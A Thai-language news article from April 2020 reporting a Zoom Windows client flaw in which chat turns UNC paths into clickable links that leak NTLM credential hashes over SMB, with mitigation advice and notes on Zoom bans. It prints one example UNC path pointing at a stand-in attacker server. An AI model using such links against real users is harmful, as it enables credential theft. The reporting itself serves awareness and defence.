Zoom Client พบช่องโหว่ เสี่ยงข้อมูลรั่วไหล
8 เมษายน 2020
นักวิจัยด้านความมั่นคงปลอดภัยไซเบอร์ Mitch ค้นพบว่า Zoom โปรแกรมที่ให้บริการ Video Conference ยอดนิยมนั้น มีความเสี่ยงทำข้อมูลส่วนตัวรั่วไหล เนื่องจาก ฟังก์ชั่นการใช้งานของ Zoom นอกจากจะ Video call แล้วยังมีหน้าต่างแชทสำหรับพูดคุย (chat interface) อีกด้วย ซึ่งหากมีการส่งลิงก์ URL ใด ๆ ก็ตามผ่านทางช่องแชท จะถูกโปรแกรม Zoom Client แปลงเป็น hyperlinks ทันที และเมื่อสมาชิกคนอื่นคลิกและเปิด URL ด้วย default browser ก็จะทำให้ Zoom Windows client มีความเสี่ยงที่จะถูก UNC path injection ภายใน chat interface ซึ่งช่องโหว่นี้เองที่ทำให้แฮกเกอร์สามารถขโมยข้อมูล Windows credentials ของผู้ใช้งานที่คลิก Link ได้
จากภาพ Chat interface จะเห็นว่ามี URL ปกติและ UNC path อย่าง \\evil.server.com\images\cat.jpg ทั้ง 2 ถูกเปลี่ยนให้เป็นลิงก์ที่สามารถคลิกได้
หากผู้ใช้งานคลิก UNC path ก็จะทำให้ Window เชื่อมต่อไปยัง Server ปลายทางด้วย SMB file-sharing protocol เพื่อเปิดภาพ cat.jpg ดังนั้น Window จะสามารถส่ง Username login และ NTLM password hash ที่สามารถ cracked ได้ด้วยเครื่องมือ Free อย่าง Hashcat to dehash เพื่อเปิดเผยรหัสผู้ใช้
สำหรับการแก้ไขช่องโหว่นี้ให้ไปที่การตั้งค่า Zoom ปิดการแปลง UNC paths ให้เป็น hyperlinks ดังนี้
การกำหนดค่าคอมพิวเตอร์ > การตั้งค่า Windows > การตั้งค่าความปลอดภัย > นโยบายท้องถิ่น > ตัวเลือกความปลอดภัย > ความปลอดภัย > เครือข่าย: จำกัด NTLM: การรับส่งข้อมูล NTLM ไปยังเซิร์ฟเวอร์ระยะไกล
จากหลาย ๆ สาเหตุที่ Zoom เสี่ยงทำข้อมูลรั่วไหล ไม่ว่าจะเป็นการยอมรับว่ายอมรับไม่ได้เข้ารหัส end-to-end หรือเคสอื่น ๆ จนทำให้บางประเทศ เช่น ไต้หวันประกาศสั่งห้ามไม่ให้เจ้าหน้าที่ของรัฐใช้แอปพลิเคชัน Zoom สำหรับการประชุมทางไกล เพราะกังวลด้านความปลอดภัย ซึ่งทางการไต้หวันได้แถลงการณ์ โดยระบุว่า หน่วยงานทั้งหมดควรหลีกเลี่ยงการใช้การแอปพลิเคชันดังกล่าว เนื่องจากไม่มีความปลอดภัยมากพอ และแฮกเกอร์อาจเข้าถึงข้อมูลที่สำคัญได้ ก่อนหน้านี้ กระทรวงศึกษาธิการรัฐนิวยอร์ก ก็มีมติสั่งแบนโปรแกรม Zoom ไม่ให้นำมาใช้งานในการเรียนการสอนทุกโรงเรียนในนิวยอร์ก เพราะพบช่องโหว่ของ Zoom และมีผู้เชี่ยวชาญหลายคนออกมาเตือนในประเด็นดังกล่าว ทำให้ความน่าเชื่อถือลดลง
และทาง BleepingComputer เองได้แจ้งไปทาง Zoom เกี่ยวกับช่องโหว่นี้แล้ว แต่ยังไม่ได้รับการตอบรับและติดต่อกลับจาก Zoom ดังนั้น ขอให้ผู้ใช้งานปิดการตั้งค่านี้ไปก่อนและรอการประกาศการแก้ไขใหม่อย่างเป็นทางการต่อไป
ที่มา:
https://www.bleepingcomputer.com/news/security/zoom-lets-attackers-steal-windows-credentials-run-programs-via-unc-links/
https://www.bangkokbiznews.com/news/detail/874975
บทความที่เกี่ยวข้อง